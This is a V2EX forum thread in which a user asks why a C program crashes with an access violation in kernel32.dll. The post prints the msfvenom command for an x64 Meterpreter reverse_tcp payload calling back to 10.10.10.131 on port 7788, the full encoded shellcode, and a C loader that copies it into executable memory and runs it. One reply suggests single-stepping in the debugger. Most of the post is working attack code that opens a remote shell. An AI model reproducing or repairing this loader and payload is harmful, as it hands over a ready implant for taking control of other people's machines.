V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
SgtDaJim
V2EX  ›  C

kernel32.dll 0xC0000005: 执行位置 0x0000000076E3A404 时发生访问冲突

  •  
  •   SgtDaJim · 2016-11-29 01:55:10 +08:00 · 1847 次点击
    这是一个创建于 2915 天前的主题,其中的信息可能已经有所发展或是发生改变。

    又是用 c 语言执行 shellcode 的问题。。
    shellcode 是用 msfvenom 生成的 windows/x64/meterpreter/reverse_tcp 。注意是 x64 的。

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.131 lport=7788 -b "\x00\x0a\x0d" --platform windows -f c
    No Arch selected, selecting Arch: x86_64 from the payload
    Found 2 compatible encoders
    Attempting to encode payload with 1 iterations of generic/none
    generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
    Attempting to encode payload with 1 iterations of x64/xor
    x64/xor succeeded with size 551 (iteration=0)
    x64/xor chosen with final size 551
    Payload size: 551 bytes
    Final size of c file: 2339 bytes
    unsigned char buf[] =
    "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
    "\xff\xff\x48\xbb\x62\x68\x19\xad\x30\x9b\xd1\x92\x48\x31\x58"
    "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x9e\x20\x9a\x49\xc0\x73"
    "\x1d\x92\x62\x68\x58\xfc\x71\xcb\x83\xc3\x34\x20\x28\x7f\x55"
    "\xd3\x5a\xc0\x02\x20\x92\xff\x28\xd3\x5a\xc0\x42\x20\x92\xdf"
    "\x60\xd3\xde\x25\x28\x22\x54\x9c\xf9\xd3\xe0\x52\xce\x54\x78"
    "\xd1\x32\xb7\xf1\xd3\xa3\xa1\x14\xec\x31\x5a\x33\x7f\x30\x29"
    "\x48\xe5\xbb\xc9\xf1\x19\x20\x54\x51\xac\xe0\xfd\x50\xea\x7a"
    "\x63\x1b\xa2\xb5\xe9\xd1\x92\x62\xe3\x99\x25\x30\x9b\xd1\xda"
    "\xe7\xa8\x6d\xca\x78\x9a\x01\xc2\xe9\x20\x01\xe9\xbb\xdb\xf1"
    "\xdb\x63\xb8\xfa\xfb\x78\x64\x18\xd3\xe9\x5c\x91\xe5\x31\x4d"
    "\x9c\xa3\xab\x20\x28\x6d\x9c\xda\x10\x5b\x6f\x29\x18\x6c\x08"
    "\x7b\xa4\x63\x2e\x6b\x55\x89\x38\xde\xe8\x43\x17\xb0\x41\xe9"
    "\xbb\xdb\xf5\xdb\x63\xb8\x7f\xec\xbb\x97\x99\xd6\xe9\x28\x05"
    "\xe4\x31\x4b\x90\x19\x66\xe0\x51\xac\xe0\xda\x89\xd3\x3a\x36"
    "\x40\xf7\x71\xc3\x90\xcb\x23\x32\x51\x2e\xdc\xbb\x90\xc0\x9d"
    "\x88\x41\xec\x69\xc1\x99\x19\x70\x81\x52\x52\xcf\x64\x8c\xdb"
    "\xdc\x1f\x6a\x9f\x6f\xa8\xe3\x92\x62\x29\x4f\xe4\xb9\x7d\x99"
    "\x13\x8e\xc8\x18\xad\x30\xd2\x58\x77\x2b\xd4\x1b\xad\x2e\xf7"
    "\xdb\x98\x68\xeb\x58\xf9\x79\x12\x35\xde\xeb\x99\x58\x17\x7c"
    "\xec\xf7\x95\x9d\xbd\x55\x24\xda\xf3\xd0\x93\x62\x68\x40\xec"
    "\x8a\xb2\x51\xf9\x62\x97\xcc\xc7\x35\xda\x8f\xc2\x32\x25\x28"
    "\x64\x7d\xaa\x11\xda\x9d\xa8\x51\x24\xf2\xd3\x2e\x52\x2a\xe1"
    "\xd8\xec\x8a\x71\xde\x4d\x82\x97\xcc\xe5\xb9\x5c\xbb\x82\x23"
    "\x30\x55\x24\xd2\xd3\x58\x6b\x23\xd2\x80\x08\x44\xfa\x2e\x47"
    "\xe7\xa8\x6d\xa7\x79\x64\x1f\xe7\x87\x80\x8a\xad\x30\x9b\x99"
    "\x11\x8e\x78\x51\x24\xd2\xd6\xe0\x5b\x08\x6c\x58\xf5\x78\x12"
    "\x28\xd3\xd8\x6a\xc0\x65\x6f\x64\x04\x11\x9a\x68\x67\xf8\x78"
    "\x18\x15\xb2\x3c\xe1\xef\xc7\x70\xda\x88\xfa\x62\x78\x19\xad"
    "\x71\xc3\x99\x1b\x90\x20\x28\x64\x71\x21\x89\x36\x31\x8d\xe6"
    "\x78\x78\x12\x12\xdb\xeb\xaf\x54\x9c\xf9\xd2\x58\x62\x2a\xe1"
    "\xc3\xe5\xb9\x62\x90\x28\x60\xb1\xd1\xf2\xcf\x4e\x52\x6a\x62"
    "\x15\x31\xf5\x71\xcc\x88\xfa\x62\x28\x19\xad\x71\xc3\xbb\x92"
    "\x38\x29\xa3\xa6\x1f\x94\xe1\x6d\xb7\x3f\x40\xec\x8a\xee\xbf"
    "\xdf\x03\x97\xcc\xe4\xcf\x55\x38\xae\x9d\x97\xe6\xe5\x31\x58"
    "\x99\xbb\xa4\x20\x9c\x5b\x45\x2f\x90\x6d\x85\x30\x73\xad\x69"
    "\xd2\x16\x50\x92\xdd\xbb\xfb\xcf\x4e\xd1\x92";
    

    c 语言代码:
    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    
    /* run this program using the console pauser or add your own getch, system("pause") or input loop */
    
    unsigned char buf[] =
    "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
    "\xff\xff\x48\xbb\x62\x68\x19\xad\x30\x9b\xd1\x92\x48\x31\x58"
    "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x9e\x20\x9a\x49\xc0\x73"
    "\x1d\x92\x62\x68\x58\xfc\x71\xcb\x83\xc3\x34\x20\x28\x7f\x55"
    "\xd3\x5a\xc0\x02\x20\x92\xff\x28\xd3\x5a\xc0\x42\x20\x92\xdf"
    "\x60\xd3\xde\x25\x28\x22\x54\x9c\xf9\xd3\xe0\x52\xce\x54\x78"
    "\xd1\x32\xb7\xf1\xd3\xa3\xa1\x14\xec\x31\x5a\x33\x7f\x30\x29"
    "\x48\xe5\xbb\xc9\xf1\x19\x20\x54\x51\xac\xe0\xfd\x50\xea\x7a"
    "\x63\x1b\xa2\xb5\xe9\xd1\x92\x62\xe3\x99\x25\x30\x9b\xd1\xda"
    "\xe7\xa8\x6d\xca\x78\x9a\x01\xc2\xe9\x20\x01\xe9\xbb\xdb\xf1"
    "\xdb\x63\xb8\xfa\xfb\x78\x64\x18\xd3\xe9\x5c\x91\xe5\x31\x4d"
    "\x9c\xa3\xab\x20\x28\x6d\x9c\xda\x10\x5b\x6f\x29\x18\x6c\x08"
    "\x7b\xa4\x63\x2e\x6b\x55\x89\x38\xde\xe8\x43\x17\xb0\x41\xe9"
    "\xbb\xdb\xf5\xdb\x63\xb8\x7f\xec\xbb\x97\x99\xd6\xe9\x28\x05"
    "\xe4\x31\x4b\x90\x19\x66\xe0\x51\xac\xe0\xda\x89\xd3\x3a\x36"
    "\x40\xf7\x71\xc3\x90\xcb\x23\x32\x51\x2e\xdc\xbb\x90\xc0\x9d"
    "\x88\x41\xec\x69\xc1\x99\x19\x70\x81\x52\x52\xcf\x64\x8c\xdb"
    "\xdc\x1f\x6a\x9f\x6f\xa8\xe3\x92\x62\x29\x4f\xe4\xb9\x7d\x99"
    "\x13\x8e\xc8\x18\xad\x30\xd2\x58\x77\x2b\xd4\x1b\xad\x2e\xf7"
    "\xdb\x98\x68\xeb\x58\xf9\x79\x12\x35\xde\xeb\x99\x58\x17\x7c"
    "\xec\xf7\x95\x9d\xbd\x55\x24\xda\xf3\xd0\x93\x62\x68\x40\xec"
    "\x8a\xb2\x51\xf9\x62\x97\xcc\xc7\x35\xda\x8f\xc2\x32\x25\x28"
    "\x64\x7d\xaa\x11\xda\x9d\xa8\x51\x24\xf2\xd3\x2e\x52\x2a\xe1"
    "\xd8\xec\x8a\x71\xde\x4d\x82\x97\xcc\xe5\xb9\x5c\xbb\x82\x23"
    "\x30\x55\x24\xd2\xd3\x58\x6b\x23\xd2\x80\x08\x44\xfa\x2e\x47"
    "\xe7\xa8\x6d\xa7\x79\x64\x1f\xe7\x87\x80\x8a\xad\x30\x9b\x99"
    "\x11\x8e\x78\x51\x24\xd2\xd6\xe0\x5b\x08\x6c\x58\xf5\x78\x12"
    "\x28\xd3\xd8\x6a\xc0\x65\x6f\x64\x04\x11\x9a\x68\x67\xf8\x78"
    "\x18\x15\xb2\x3c\xe1\xef\xc7\x70\xda\x88\xfa\x62\x78\x19\xad"
    "\x71\xc3\x99\x1b\x90\x20\x28\x64\x71\x21\x89\x36\x31\x8d\xe6"
    "\x78\x78\x12\x12\xdb\xeb\xaf\x54\x9c\xf9\xd2\x58\x62\x2a\xe1"
    "\xc3\xe5\xb9\x62\x90\x28\x60\xb1\xd1\xf2\xcf\x4e\x52\x6a\x62"
    "\x15\x31\xf5\x71\xcc\x88\xfa\x62\x28\x19\xad\x71\xc3\xbb\x92"
    "\x38\x29\xa3\xa6\x1f\x94\xe1\x6d\xb7\x3f\x40\xec\x8a\xee\xbf"
    "\xdf\x03\x97\xcc\xe4\xcf\x55\x38\xae\x9d\x97\xe6\xe5\x31\x58"
    "\x99\xbb\xa4\x20\x9c\x5b\x45\x2f\x90\x6d\x85\x30\x73\xad\x69"
    "\xd2\x16\x50\x92\xdd\xbb\xfb\xcf\x4e\xd1\x92";
    
    
    int main(void) {
    	
        printf("Execute meterpreter shellcode.....\n");  
    	PVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    	memcpy(Memory, buf, sizeof(buf));
    	((void(*)())Memory)();  
    }
    

    然后在 vs2013 上将解决方案平台改为 x64 ,然后运行 debug ,开始是正常的,然后过了几秒,就出现

    0x0000000076E3A404 ( kenerl32.dll )(xxx.exe 中)处有未经处理的异常:
    0xC0000005: 执行位置 0x0000000076E3A404 时发生访问冲突

    请问这改如何解决?谢谢各位大神

    2 条回复
    xss
        1
    xss  
       2016-11-29 10:00:42 +08:00
    你还是先单步看一下吧, 看看具体是 shellcode 的什么地方发生的异常.

    发这种错误信息, 估计没什么人感兴趣帮你调试
    SgtDaJim
        2
    SgtDaJim  
    OP
       2016-11-29 11:01:52 +08:00
    @xss 好的。。我是没用过 vs 。。不会用。。今晚再百度摸索一下。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5404 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 03:31 · PVG 11:31 · LAX 19:31 · JFK 22:31
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.